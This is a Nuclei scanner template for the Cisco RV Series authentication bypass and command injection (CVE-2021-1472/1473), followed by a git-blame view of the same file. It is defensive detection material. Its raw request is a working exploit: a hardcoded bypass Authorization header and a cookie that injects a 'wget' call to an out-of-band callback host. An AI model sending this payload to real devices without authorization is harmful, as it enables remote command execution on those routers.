nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml

id: cisco-rv-series-rce

info:
  name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
  author: gy741
  severity: critical
  description: |
    Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
    attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor
    mation about these vulnerabilities, see the Details section of this advisory.
  reference:
    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2021-1472,CVE-2021-1473
    cwe-id: CWE-119
  tags: cve,cve2021,cisco,rce,auth-bypass

requests:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionid='`wget http://{{interactsh-url}}`'
        Authorization: QUt6NkpTeTE6dmk4cW8=
        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536

        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="option"

        5NW9Cw1J
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="destination"

        J0I5k131j2Ku
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file.path"

        EKsmqqg0
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file"; filename="config.xml"
        Content-Type: application/xml

        qJ57CM9
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="filename"

        JbYXJR74n.xml
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="GXbLINHYkFI"

        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
        -----------------------------392306610282184777655655237536--

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00			`id: cisco-rv-series-rce`

			`info:`
			`name: Cisco Small Business RV Series - Authentication Bypass and Command Injection`
			`author: gy741`
			`severity: critical`
			`description: \|`
			`Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote`
			`attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor`
			`mation about these vulnerabilities, see the Details section of this advisory.`
			`reference:`
			`- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/`
			`- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1472`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-1473`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`
			`cvss-score: 9.8`
			`cve-id: CVE-2021-1472,CVE-2021-1473`
			`cwe-id: CWE-119`
Update cisco-rv-series-rce.yaml 2022-05-23 11:56:06 +00:00			`tags: cve,cve2021,cisco,rce,auth-bypass`
Create cisco-rv-series-rce.yaml Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more infor mation about these vulnerabilities, see the Details section of this advisory. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-05-21 15:15:55 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /upload HTTP/1.1`
			`Host: {{Hostname}}`
			Cookie: sessionid='`wget http://{{interactsh-url}}`'
			`Authorization: QUt6NkpTeTE6dmk4cW8=`
			`Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536`

			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="option"`

			`5NW9Cw1J`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="destination"`

			`J0I5k131j2Ku`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="file.path"`

			`EKsmqqg0`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="file"; filename="config.xml"`
			`Content-Type: application/xml`

			`qJ57CM9`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="filename"`

			`JbYXJR74n.xml`
			`-----------------------------392306610282184777655655237536`
			`Content-Disposition: form-data; name="GXbLINHYkFI"`

			`<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>`
			`-----------------------------392306610282184777655655237536--`

			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- http`